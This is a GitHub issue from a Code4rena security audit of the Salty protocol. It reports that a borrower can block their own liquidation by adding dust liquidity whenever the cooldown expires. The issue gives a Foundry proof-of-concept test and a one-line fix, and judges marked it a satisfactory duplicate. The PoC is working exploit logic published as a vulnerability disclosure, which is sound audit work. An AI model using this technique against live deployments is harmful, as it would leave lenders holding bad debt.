Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

User can prevent anyone from liquidating him, by continuously adding dust liquidity #24

Closed
c4-bot-7 opened this issue Jan 17, 2024 · 2 comments
Closed

User can prevent anyone from liquidating him, by continuously adding dust liquidity #24

c4-bot-7 opened this issue Jan 17, 2024 · 2 comments
Labels
3 (High Risk) Assets can be stolen/lost/compromised directly bug Something isn't working duplicate-312 edited-by-warden satisfactory satisfies C4 submission criteria; eligible for awards

Comments

@c4-bot-7
Copy link
Contributor

c4-bot-7 commented Jan 17, 2024
edited by c4-bot-2
Loading

Lines of code

https://github.com/code-423n4/2024-01-salty/blob/main/src/stable/CollateralAndLiquidity.sol#L140-L188

Vulnerability details

Impact

Users can be liquidated if their collateral to USDS ratio falls below a certain ratio/percent. There's also another concept while adding/removing liquidity to the protocol and that is the cooldown, where users have to wait a certain period before doing another action, either addition or removal. However, the liquidate function liquidateUser is using:

_decreaseUserShare(
    wallet,
    collateralPoolID,
    userCollateralAmount,
    true
);

while setting useCooldown to true, so it will check the last user's action before liquidating him. Users can abuse this and continuously (when the cooldown passes) add dust liquidity which blocks anyone from liquidating them, and the function will always revert with Must wait for the cooldown to expire.

Proof of Concept

function test_bug_DOSLiquidate() public {
    uint256 depositedWBTC = (1000 ether * 10 ** 8) /
        priceAggregator.getPriceBTC();
    uint256 depositedWETH = (1000 ether * 10 ** 18) /
        priceAggregator.getPriceETH();

    vm.prank(bob);
    collateralAndLiquidity.depositCollateralAndIncreaseShare(
        depositedWBTC,
        depositedWETH,
        0,
        block.timestamp,
        false
    );

    vm.startPrank(alice);
    collateralAndLiquidity.depositCollateralAndIncreaseShare(
        depositedWBTC,
        depositedWETH,
        0,
        block.timestamp,
        false
    );
    vm.warp(block.timestamp + 1 hours);
    collateralAndLiquidity.depositCollateralAndIncreaseShare(
        depositedWBTC,
        depositedWETH,
        0,
        block.timestamp,
        false
    );
    vm.stopPrank();

    uint256 maxUSDS = collateralAndLiquidity.maxBorrowableUSDS(alice);

    vm.prank(alice);
    collateralAndLiquidity.borrowUSDS(maxUSDS);

    _crashCollateralPrice();

    vm.prank(bob);
    vm.expectRevert("Must wait for the cooldown to expire");
    collateralAndLiquidity.liquidateUser(alice);

    vm.warp(block.timestamp + 1 hours);

    vm.prank(alice);
    collateralAndLiquidity.depositCollateralAndIncreaseShare(
        101,
        101,
        0,
        block.timestamp,
        false
    );

    vm.prank(bob);
    vm.expectRevert("Must wait for the cooldown to expire");
    collateralAndLiquidity.liquidateUser(alice);
}

Tools Used

Manual review + vscode

Recommended Mitigation Steps

Replace the following in liquidateUser function:

_decreaseUserShare(
    wallet,
    collateralPoolID,
    userCollateralAmount,
    true
);

with

_decreaseUserShare(
    wallet,
    collateralPoolID,
    userCollateralAmount,
    false
);

Assessed type

DoS
@c4-bot-7 c4-bot-7 added 3 (High Risk) Assets can be stolen/lost/compromised directly bug Something isn't working labels Jan 17, 2024
c4-bot-7 added a commit that referenced this issue Jan 17, 2024
@c4-bot-7
0xAlix2 issue #24
fee5904
@c4-judge c4-judge closed this as completed Feb 2, 2024
@c4-judge
Copy link
Contributor

c4-judge commented Feb 2, 2024

Picodes marked the issue as duplicate of #312

@c4-judge
Copy link
Contributor

Picodes marked the issue as satisfactory

@c4-judge c4-judge added the satisfactory satisfies C4 submission criteria; eligible for awards label Feb 17, 2024
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Assignees
No one assigned
Labels
3 (High Risk) Assets can be stolen/lost/compromised directly bug Something isn't working duplicate-312 edited-by-warden satisfactory satisfies C4 submission criteria; eligible for awards
Projects
None yet
Milestone
No milestone
Development

No branches or pull requests
3 participants
@c4-judge @code4rena-admin @c4-bot-7